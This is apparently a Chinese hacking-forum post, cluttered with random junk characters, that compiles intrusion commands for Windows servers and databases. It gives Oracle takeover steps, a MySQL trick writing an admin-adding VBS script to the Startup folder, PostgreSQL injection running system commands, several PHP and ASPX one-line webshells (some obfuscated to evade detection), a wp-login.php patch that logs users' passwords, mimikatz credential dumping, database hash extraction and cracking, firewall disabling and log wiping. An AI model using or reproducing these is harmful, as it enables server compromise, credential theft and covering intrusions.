7 M( V9 S- x# e5 j# l* x6 ?' u% |5 ]2 H/ R3 v
0 W1 b: S8 g. U
程序代码5 [9 b3 j# D7 d4 j
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\NoLMHash2 K& \" ]+ D% k9 ]3 I- {1 P
" V8 H& y5 L3 }7 `; H) J# s2 L设置为1,关闭LM Hash ; }/ B7 f, R: M& M& I h + G; ?6 U. R- U% A数据库安全:入侵Oracle数据库常用操作命令 " D& L$ W4 p+ _3 d4 D) _& b: C最近遇到一个使用了Oracle数据库的服务器,在狂学Oracle+请教高手后终于搞到了网站后台管理界面的所有用户密码。我发现Oracle操作起来真是太麻烦,为了兄弟们以后少走些弯路,我把入侵当中必需的命令整理出来。 1 C( ^ Y! q' \; C; V1、su – oracle 不是必需,适合于没有DBA密码时使用,可以不用密码来进入sqlplus界面。7 O. m- M" @7 q- v$ R7 y" T5 b$ ^3 e
2、sqlplus /nolog 或sqlplus system/manager 或./sqlplus system/manager@ora9i; 9 k- v* V1 _; r7 n3、SQL>connect / as sysdba ;(as sysoper)或 w" q# `7 ? b9 j. R' Y# `1 Yconnect internal/oracle AS SYSDBA ;(scott/tiger) , W2 ]2 [7 z }7 D5 [conn sys/change_on_install as sysdba;* d w0 N) c4 w* G6 ]
4、SQL>startup; 启动数据库实例 7 Y: D+ Y- C' u' j5、查看当前的所有数据库: select * from v$database; " t" _" h' L7 l+ V# S0 ~select name from v$database;4 G$ X- T* S7 A8 ?3 h, [; w# ^
6、desc v$databases; 查看数据库结构字段 3 q, Y# B' H8 ?) Q8 X3 N7、怎样查看哪些用户拥有SYSDBA、SYSOPER权限:8 p: ~7 D# j% h( `
SQL>select * from V_$PWFILE_USERS; `5 ? `9 B( \+ N! t6 pShow user;查看当前数据库连接用户 4 M9 ?) }$ f3 \( m4 ]/ I8、进入test数据库:database test;2 e) T$ \1 t+ N5 o1 [ K# |
9、查看所有的数据库实例:select * from v$instance;1 h% ]2 W T* r* u- y
如:ora9i0 e6 t8 g4 g" h$ i+ K6 }, d
10、查看当前库的所有数据表:+ R, U! X3 G" M, y2 z
SQL> select TABLE_NAME from all_tables;* F" L0 f( w+ g Y n% {# d
select * from all_tables;. C' U2 P8 c- `: W+ }% h
SQL> select table_name from all_tables where table_name like '%u%';: O$ g/ m8 }- D6 Z2 m3 \
TABLE_NAME* v9 D3 O% T5 g+ m( x
------------------------------4 H& \5 D* ^6 }4 Z
_default_auditing_options_ ) r5 O, b+ D: s1 ~5 t% D% v11、查看表结构:desc all_tables;6 d/ k. C# K h
12、显示CQI.T_BBS_XUSER的所有字段结构:) d/ } b9 M- c2 l
desc CQI.T_BBS_XUSER; - S/ f2 m v6 o: n. n2 l3 a13、获得CQI.T_BBS_XUSER表中的记录:, ^/ E) Q; I5 V& A6 E9 i0 k9 I
select * from CQI.T_BBS_XUSER;1 X9 ~ Q" X* t+ m; L
14、增加数据库用户:(test11/test) ! _+ P) e9 M) @: S+ e) O" h9 u% n# wcreate user test11 identified by test default tablespace users Temporary TABLESPACE Temp;, T9 `4 s5 E! u2 h- H2 z5 U7 u& f% Z
15、用户授权: ~* \ i9 \$ V7 Q" A2 V
grant connect,resource,dba to test11; & X9 A9 g9 w4 X8 t9 Ggrant sysdba to test11; ) z5 T( L( }& M# mcommit; 5 i) B) j& L! n K16、更改数据库用户的密码:(将sys与system的密码改为test.) ; W, ~; Q+ p( I% valter user sys indentified by test;5 j! d* v3 ?: a0 v( o1 J2 b9 ]
alter user system indentified by test;- i" \" {8 S6 [$ \$ p5 w2 V
{4 j+ L% ~5 G+ Z& ZapplicationContext-util.xml 3 J5 E5 j+ \) s$ ~' W/ PapplicationContext.xml % \. D* S: o0 i+ S# \struts-config.xml6 @) H" ~' u2 T: u4 Z$ W
web.xml 8 t G* O* Z# A1 Z" G8 \3 bserver.xml ) O+ `1 { n5 g& C6 f) W/ h6 S! Ztomcat-users.xml 5 ^/ h* |! Q5 j! P) phibernate.cfg.xml$ L9 T8 q$ O4 B, x$ I5 T* x/ G
database_pool_config.xml # v' t0 C" ], G' B8 F4 h# h, A$ ^" f0 j0 G% O
) Y8 b& M$ t. C& G/ ]6 A
\WEB-INF\classes\hibernate.cfg.xml 数据库连接配置 , Q. t+ b g. z& h\WEB-INF\server.xml 类似http.conf+mysql.ini+php.ini" \4 {" P& T/ y. e, c- Q
\WEB-INF\struts-config.xml 文件目录结构- W9 l3 w) N0 I
8 c! w5 R' l+ I; g1 ?$ H2 ?8 h
spring.properties 里边包含hibernate.cfg.xml的名称& t* c, O6 G! S( P
& y. @ Z3 r6 h+ R: @2 J4 K% X
: s# `8 y( _3 q" q1 N1 @ m8 UC:\Program Files\Apache Software Foundation\Tomcat 5.5\conf\tomcat-users.xml' g9 s/ W' ^% ]; z+ w
5 {# q/ t! o. m; }
如果都找不到 那就看看class文件吧。。1 |2 H7 |! x. T. W
6 J: K5 F9 J8 u测试1:% J. Z2 x# e( M5 ]' v0 h
SELECT top 1 name=STUFF((SELECT ','+[name] FROM sysobjects t where xtype='U' FOR XML PATH('')), 1, 1, '') FROM sysobjects t1 ! `$ d6 e3 ~/ \1 Z1 x # A' c3 J: l( v5 H p测试2:& g; R& R$ A' W5 G9 k0 o: L
: B+ M& [: }" h3 h& d! M) K3 q4 Rcreate table dirs(paths varchar(100),paths1 varchar(100), id int) . {' B* ^3 Z7 |, y+ m% |8 n6 Z' m- G7 I( L. Y+ L
delete dirs;insert dirs exec master.dbo.xp_dirtree 'c:\',1,1--8 d7 k8 }! b+ F' G2 K! Z
, r R3 K; ?6 Q0 Z, `% F! pSELECT top 1 paths=STUFF((SELECT ','+[paths] FROM dirs FOR XML PATH('')), 1, 1, '') FROM dirs t1 6 N/ z- |1 @+ {- A$ x1 L0 G . l6 g ^ c7 i# Q. {; X* A+ I% M( ^( X查看虚拟机中的共享文件: - C1 t+ M) l! [在虚拟机中的cmd中执行! t1 h* u! H7 w$ l
\\.host\Shared Folders 3 e8 W! r6 [5 l0 ^* V 3 ~; P3 F8 `* E) @5 l* p2 T- ucmdshell下找终端的技巧+ L; ?* g7 C0 [. h/ ^
找终端: " H. `+ y* T! h& y1 b
第一步: Tasklist/SVC 列出所有进程,系统服务及其对应的PID值! . s8 n( _ {# S; z- t8 n: n; h+ z4 `
而终端所对应的服务名为:TermService : i) Z8 q9 o: q( u# K- `第二步:用netstat -ano命令,列出所有端口对应的PID值! # f$ N7 G1 @5 r9 r& B2 u) a+ _ 找到PID值所对应的端口 2 S$ z* S5 K7 e/ ?9 p2 U. y 0 c) E8 o) E' N$ ^) \2 j查询sql server 2005中的密码hash2 l# R4 a6 A+ [( W
SELECT password_hash FROM sys.sql_logins where name='sa' / R: R- T! A* h# \9 sSELECT '<%execute request("a")%>' into [a] in 'c:\x.asp;a.xls' 'excel 8.0;' from a z8 B, z5 n: l- S* T1 M6 P) P4 @access中导出shell 9 M" y5 z7 \) k$ @* ^; i- D: a4 M' W/ e; o3 I
中文版本操作系统中针对mysql添加用户完整代码:8 q2 x7 M$ o$ b+ z j- n& o
* D3 u% ^8 T9 D: {- ~
use test;6 ]5 `# G& M G. g
create table a (cmd text); 1 S, Y7 }/ g3 s$ l" ~; m7 Pinsert into a values ("set wshshell=createobject (""wscript.shell"") " );( M! _3 J% M; S5 g1 r; F
insert into a values ("a=wshshell.run (""cmd.exe /c net user test 123!@#abcABC /add"",0) " );" q) k2 ~6 i! L* V( R+ S- D
insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators test /add"",0) " ); ' `5 G; I5 R3 q; W ]" ]select * from a into outfile "C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\\启动\\a.vbs"; ! a. f5 n6 `/ Y& N' Kdrop table a;2 B1 U6 _ w& l' M
- s( k1 P; F9 H% C- ~" X英文版本: ( g. D9 r3 J1 F1 |+ f; Y" f! l+ ^ # S/ b0 Q2 D; Q7 d9 l6 @& g; ^use test;, u+ M. F6 {% U$ v" u8 d) J4 {
create table a (cmd text);8 z9 r* p! s9 \7 o+ I! t
insert into a values ("set wshshell=createobject (""wscript.shell"") " );3 t( M& @' q2 d5 \; B' ~
insert into a values ("a=wshshell.run (""cmd.exe /c net user test 123!@#abcABC /add"",0) " ); / U$ K$ W, \! k* w. A& @0 Q; ^insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators test /add"",0) " ); & x' G1 T7 w8 r5 t- f4 d- S5 Rselect * from a into outfile "C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\a.vbs"; ( E6 P0 y! H2 Y7 m- t$ e; xdrop table a;9 _; e% B( C8 _! D1 `+ B4 A+ L, f
5 w# a9 y4 j z) j, {4 x5 o$ ]- b. J/store.php?id=1; CREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6','system' LANGUAGE 'C' 8 }; p6 i" n- \" B5 R. n: eSTRICT -- # S! E0 g; s* A6 N; o) v# u2 {; C. ^: |) [
/store.php?id=1; SELECT system('uname -a > /tmp/test') --) v! G0 {# Z. M5 `) c8 R2 F! G
' F2 p; _: y7 G
/store.php?id=1; COPY stdout(system_out) FROM '/tmp/test' --0 M4 L# C& Q" K6 y
( R/ D) ]3 c( p' Y
/store.php?id=1 UNION ALL SELECT NULL,(SELECT stdout FROM system_out ORDER BY id DESC),NULL LIMIT 1 OFFSET 1-- 8 H6 B! M+ n/ ynet stop sharedaccess stop the default firewall ! b( ]: F. Y; r* [- O) X1 Mnetsh firewall show show/config default firewall6 \, [$ f4 m. H1 Q3 C) }$ Q
netsh firewall set notifications disable disable the notify when the program is disabled by the default firewall3 E% @$ g [ Y9 Q+ ^6 U2 o
netsh firewall add allowedprogram c:\1.exe Svchost add the program which is allowed by default firewall3 a3 b* Y9 z) q
修改3389端口方法(修改后不易被扫出)4 h |$ `! A% N& }+ K
修改服务器端的端口设置,注册表有2个地方需要修改# O. x( t4 S- q# O# k L9 B3 h
4 ~! o0 s: W. l9 o$reg($_FILES[MyFile][tmp_name],$_FILES[MyFile][name]);+ u" j- c5 Z0 D1 C9 z) C0 T+ i
, q1 x4 j$ }* g//重命名任何文件0 E. z, n1 e8 \6 U P
( _" k, e" \3 I, z
4、7 J' `% R1 r' ^* Q1 Z% Z
$ k) y8 v2 K! Z% U0 J( q
$gzid = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e"; 5 K; V7 v( k# V5 T% I* z7 H- `* H6 T! Z9 |6 p
$gzid("/[discuz]/e",$_POST['h'],"Access"); / Z5 L" d9 g1 l8 U5 C6 _9 v0 h( P+ t% k# C/ ?
//菜刀一句话: j8 O2 f' G( s) ~2 x+ Q( l
7 K3 x3 p; w8 u( p$ \0 Q
5、include ($uid);7 ~& f; R* x" {# e1 Z! u
( h0 a: j* y- f- x
//危险的include函数,直接编译任何文件为php格式运行,POST 8 i" b! ~/ S! Y* e, ] O. g4 Z- {$ a& r- |* w9 m
. |8 k0 U( j. n9 y+ g+ r//gif插一句话# `2 C8 ?4 m t0 v
+ h b9 U6 Z' c* c+ o0 \6、典型一句话 - c2 h8 C8 }+ O: ?7 l7 O( ?/ _1 E8 ~
程序后门代码 1 _4 m! X0 x m+ P! l9 d<?php eval_r($_POST[sb])?> , Y3 W- K/ H3 L/ M程序代码* L2 u! [, @( r ?9 t5 u
<?php @eval_r($_POST[sb])?>- x& P- L% b5 B# B% y3 ~
//容错代码 7 ]/ ?4 X! k3 f/ q. m+ a( d: W程序代码 " ~6 G, W5 L- G4 p<?php assert($_POST[sb]);?>! p* S% ?9 S9 [8 F+ L7 q8 E
//使用lanker一句话客户端的专家模式执行相关的php语句 3 F$ A7 n" Y# e: Y程序代码- B$ T0 j9 Z. ]" Z. K
<?$_POST['sa']($_POST['sb']);?> . z& G* |2 i6 D" e* ?$ T程序代码 - S1 b: ^- p2 x9 c# z4 j<?$_POST['sa']($_POST['sb'],$_POST['sc'])?>7 q' G* j s+ }7 V' D
程序代码) U! f% X9 P3 k, O
<?php : A; s# D( M, P' G- g) }@preg_replace("/[email]/e",$_POST['h'],"error");# v/ L1 Z$ q# x2 G
?>' i. k8 K8 m+ c
//使用这个后,使用菜刀一句话客户端在配置连接的时候在"配置"一栏输入 ( B3 n) X; n( E7 H) U程序代码9 ~! }8 c* a0 O/ v
<O>h=@eval_r($_POST[c]);</O> / d8 I S) ^) ~9 W; i! S程序代码 4 ]1 t4 {& @9 c$ q( }8 B<script language="php">@eval_r($_POST[sb])</script>' _6 G( f6 e5 A) I
//绕过<?限制的一句话 & T6 Z, [* y' K7 e : G4 j/ Q% n. T2 [( |" D* ahttp://blog.gentilkiwi.com/downloads/mimikatz_trunk.zip 9 p" k; a. H. R8 l0 Q详细用法:: m+ {) N) Q+ \/ `% W4 ?
1、到tools目录。psexec \\127.0.0.1 cmd) X! R9 p" W% x& V' g0 t
2、执行mimikatz ; }) b8 S' ~! z2 ^3、执行 privilege::debug 0 X+ B4 t6 N: l1 ? l7 P4、执行 inject::process lsass.exe sekurlsa.dll , G! @6 n" ~* u5、执行@getLogonPasswords , Z" W/ p, |. _; {" [6、widget就是密码 ( M( |0 x: U9 U9 E7、exit退出,不要直接关闭否则系统会崩溃。6 W! x9 I$ x- l6 }% ~' E
- B( v& v0 z! w& r) f http://www.monyer.com/demo/monyerjs/ js解码网站比较全面 6 `" D( v% V. ^8 E: `) o$ y; M) [8 t$ W2 y( {& A# J: H- y* p
自动查找系统高危补丁8 P5 Y3 C1 [9 t v
systeminfo>a.txt&(for %i in (KB2360937 KB2478960 KB2507938 KB2566454 KB2646524 KB2645640 KB2641653 KB944653 KB952004 KB971657 KB2620712 KB2393802 kb942831 KB2503665 KB2592799) do @type a.txt|@find /i "%i"||@echo %i Not Installed!)&del /f /q /a a.txt * p/ O( @4 k; O' l/ k 8 S* ?+ y% G9 g2 i1 r* `$ Z5 S! w突破安全狗的一句话aspx后门3 T* T) ~" T& W/ l; {
<%@ Page Language="C#" ValidateRequest="false" %>. y2 |% _: q! j2 ~5 a: A
<%try{ System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["你的密码"].Value))).CreateInstance("c", true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null, null); } catch { }%>: E! K4 S% K/ t2 ~
webshell下记录WordPress登陆密码) l0 z' f/ w! k2 E' w8 B5 s6 X t& j
webshell下记录Wordpress登陆密码方便进一步社工 * h( E5 U: Z8 s/ v9 N8 x在文件wp-login.php中539行处添加: ' `3 t) Q* H+ v/ R6 ^* e2 m& s// log password6 U# W: Q& u+ S7 B( S, _
$log_user=$_POST['log'];- O- s1 y/ @' }
$log_pwd=$_POST['pwd']; ; y E5 ?$ |/ H+ k, j$log_ip=$_SERVER["REMOTE_ADDR"];1 y. }* e; J: i/ s2 N5 t
$txt=$log_user.’|’.$log_pwd.’|’.$log_ip;. g9 V( W: \" N+ S
$txt=$txt.”\r\n”; # t$ c$ L# S9 m% {& Y8 c) _* \if($log_user&&$log_pwd&&$log_ip){ # K/ q1 s$ c$ |; g0 \4 T1 T@fwrite(fopen(‘pwd.txt’,”a+”),$txt);1 q/ e9 f7 q. ]
} p0 |7 `/ U" Y, e6 W$ J% y0 l1 t( ]当action=login的时候会触发记录密码code,当然了你也可以在switch…case..语句中的default中写该代码。& Y" z: ~, X, e/ q
就是搜索case ‘login’ 5 Z# C, @) R2 b L- ]在它下面直接插入即可,记录的密码生成在pwd.txt中,* |& w) i% |/ P% W
其实修改wp-login.php不是个好办法。容易被发现,还有其他的方法的,做个记录: x5 {/ I1 ?2 L7 V8 b2 k6 A
利用II6文件解析漏洞绕过安全狗代码: : A% t& O: s6 j6 ^2 s;antian365.asp;antian365.jpg 5 o5 W! w) L: t2 _, i# f# p4 H ( ?- {. r1 ]0 d- K5 d" a各种类型数据库抓HASH破解最高权限密码!9 N# t: o/ I5 _) [, o7 ~
1.sql server2000 % T5 i# c6 P' C+ mSELECT password from master.dbo.sysxlogins where name='sa' & x6 v S: C/ y: |& W' C( V0×010034767D5C0CFA5FDCA28C4A56085E65E882E71CB0ED250341 ( o0 k& V6 `9 s1 [2FD54D6119FFF04129A1D72E7C3194F7284A7F3A+ b! ^* |( I/ N. b6 S9 @( F
) w6 F; c1 r1 f
0×0100- constant header( Z. k. i1 y# |3 ` [* g9 b; ~
34767D5C- salt 6 B- k' `* ]% O0CFA5FDCA28C4A56085E65E882E71CB0ED250341- case senstive hash - @+ B4 W" E3 c& R5 o2FD54D6119FFF04129A1D72E7C3194F7284A7F3A- upper case hash 8 _, y& \) Q* D9 `crack the upper case hash in ‘cain and abel’ and then work the case sentive hash 8 T) @% L1 n5 y3 C% bSQL server 2005:- : \0 H( _5 s2 [6 `' j! x* x/ h+ V* T/ iSELECT password_hash FROM sys.sql_logins where name='sa' 5 j8 g) ^5 v, \& ]/ e0×0100993BF2315F36CC441485B35C4D84687DC02C78B0E680411F , B, H" b2 u6 K$ x' c0×0100- constant header9 G* t5 c+ W/ J; v1 `5 i
993BF231-salt/ w8 C+ H1 T! b2 I& k2 b3 ^
5F36CC441485B35C4D84687DC02C78B0E680411F- case sensitive hash ; {& u; E6 Z: @2 `( d+ g) e6 q7 w, hcrack case sensitive hash in cain, try brute force and dictionary based attacks.! U9 l1 ~+ t. C5 r9 }- Q1 v
# ~" f" j! N4 \4 f* b1 X7 y: ]update:- following bernardo’s comments:-1 ?8 N T* e. @# f- A# o
use function fn_varbintohexstr() to cast password in a hex string. 4 ]9 {1 [# H' de.g. select name from sysxlogins union all select master.dbo.fn_varbintohexstr(password)from sysxlogins2 J9 U6 R: t/ y1 f- p) P
0 q+ R) v! _# j n+ J
MYSQL:- 9 @; }; y$ \0 m3 n4 ~5 L. s7 W" Q( [
In MySQL you can generate hashes internally using the password(), md5(), or sha1 functions. password() is the function used for MySQL’s own user authentication system. It returns a 16-byte string for MySQL versions prior to 4.1, and a 41-byte string (based on a double SHA-1 hash) for versions 4.1 and up. md5() is available from MySQL version 3.23.2 and sha1() was added later in 4.0.2. 0 [% O8 p/ r R" y$ H 3 f _! Y) T6 `3 J" `! c*mysql < 4.1 ' d5 t; i9 G- \3 v" r& u. k# _ R# S
mysql> SELECT PASSWORD(‘mypass’); + F. j) B* x) ^2 z& v+——————–+6 G. X% I9 q5 d& ]
| PASSWORD(‘mypass’) |* _) |0 B) z. W3 {
+——————–+' ^1 q' g; r7 _
| 6f8c114b58f2ce9e |; z" E2 h, {4 ]: p7 V
+——————–+ " y8 [- P: a! R! H4 H, U : V) _% V% y" Y+ H% D% C: T*mysql >=4.1 " F2 h; Q; `, V- c8 r7 B6 V, e+ V* \2 N
mysql> SELECT PASSWORD(‘mypass’);' Q% e" h% u3 |8 \6 B
+——————————————-+1 m" U3 |$ Q: O# m$ C, o/ d+ N
| PASSWORD(‘mypass’) | O1 K3 U1 q" t' h5 O3 q+——————————————-+ ! E& m+ `* s$ \| *6C8989366EAF75BB670AD8EA7A7FC1176A95CEF4 |: H( n% ?, ~# y" K: `$ o
+——————————————-+" B/ S! A: w' n2 O5 N( y
* K$ ?; m6 h M2 \ s3 F6 s" W" H9 |
Select user, password from mysql.user ! K" u4 ?3 `4 @ ]$ ^6 @% \The hashes can be cracked in ‘cain and abel’ ' h G6 Q0 R7 K: h( l. L; j 5 l F! r; `* |3 Q% S6 w$ iPostgres:-! t, r" ^; z1 }. s0 [
Postgres keeps MD5-based password hashes for database-level users in the pg_shadow table. You need to be the database superuser to read this table (usually called “postgres” or “pgsql”) ( o7 Z$ z4 \/ o$ Q( P# I4 G" zselect usename, passwd from pg_shadow;0 X! C+ o+ h9 m) [, w( S# S/ N
usename | passwd- x/ y5 P6 f6 s" O u, }
——————+————————————-' J$ x* l! o8 z# s7 Q' t
testuser | md5fabb6d7172aadfda4753bf0507ed4396* U5 |) |, K2 z8 L
use mdcrack to crack these hashes:-6 D4 h0 ^# V; n9 R' n2 W7 Z1 {
$ wine MDCrack-sse.exe –algorithm=MD5 –append=testuser fabb6d7172aadfda4753bf0507ed4396 ( n4 C) H, @$ u" }* e8 U1 l0 l0 G9 I' `( `6 N0 q5 P0 H
Oracle:-5 p& k" ~2 }4 X9 {+ l
select name, password, spare4 from sys.user$! @ j# g0 z) S1 A" ?& A
hashes could be cracked using ‘cain and abel’ or thc-orakelcrackert11g' v4 D" ?4 w9 x1 Y
More on Oracle later, i am a bit bored…. 4 x- V9 z' z6 e* m# a( `" {1 Y# t, y: ]5 x0 K9 }
6 L( c- {+ f% s( d" k+ k5 `! |在sql server2005/2008中开启xp_cmdshell& i( p7 t' G, p4 X. N' ~8 k
-- To allow advanced options to be changed.; Q& _0 W4 R& E% t
EXEC sp_configure 'show advanced options', 1 ! e. O' Q: l& K/ p9 i; fGO' p$ [0 j- X9 U4 j* S
-- To update the currently configured value for advanced options. ( t( F2 c. e7 t7 l" V* p: |RECONFIGURE0 X8 J: h: e0 n- T0 n) t
GO1 h' a7 y" \" Y) D
-- To enable the feature.# E) F m* N1 }3 j& x
EXEC sp_configure 'xp_cmdshell', 1* f* M% C; @, T: A5 l0 s( M8 W# X
GO4 G! d$ h0 N) s7 y/ j
-- To update the currently configured value for this feature. ( o7 P; P2 O$ G2 \$ kRECONFIGURE 9 l6 E$ v6 o( t P- n$ n( J0 r- eGO; _. H, H4 J/ Z6 h K. V/ K
SQL 2008 server日志清除,在清楚前一定要备份。% W' x( x* x0 k* M" s
如果Windows Server 2008 标准版安装SQL Express 2008,则在这里删除: , A& _) y, t& E' `7 T: w- D9 WX:\Users[SomeUser]\AppData\Roaming\Microsoft\Microsoft SQL Server\100\Tools\Shell\SqlStudio.bin 9 s2 ~* w, W- o% l0 W* }8 c5 t) W* {1 i5 H7 M, n: a5 c% m
对于SQL Server 2008以前的版本: 5 N p$ x6 u! k/ h& ASQL Server 2005: 1 q) q6 H% D+ n6 u删除X:\Documents and Settings\XXX\Application Data\Microsoft\Microsoft SQL Server\90\Tools\Shell\mru.dat 5 t7 P- V: l7 X) |1 SSQL Server 2000:) X$ ?: X& `8 _
清除注册表HKEY_CURRENT_USER\Software\Microsoft\Microsoft SQL Server\80\Tools\Client\PrefServers\相应的内容即可。: @# r4 e4 m [- r
- a+ }8 N% u% B M, s/ ]本帖最后由 simeon 于 2013-1-3 09:51 编辑& b3 W: D: f" M9 m: ~" [
% q1 @; ]9 Z3 R ~* w